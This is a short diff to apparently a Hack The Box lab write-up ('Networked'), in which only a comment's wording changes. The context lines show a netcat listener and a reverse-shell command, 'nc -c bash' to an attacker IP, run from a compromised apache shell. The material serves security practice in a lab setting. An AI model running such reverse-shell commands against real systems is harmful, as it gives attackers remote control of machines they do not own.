niqdev/strawhatsec/gitbook/htb/linux/networked.md

 ss -lnp | grep 4242

 # test connection: ALWAYS use v (verbose) to se a prompt when it connects
-# listen from attacking machine
+# listen from attacker machine
 nc -lvnp 4444
 # exec in "apache" shell
 nc -c bash 10.10.14.14 4444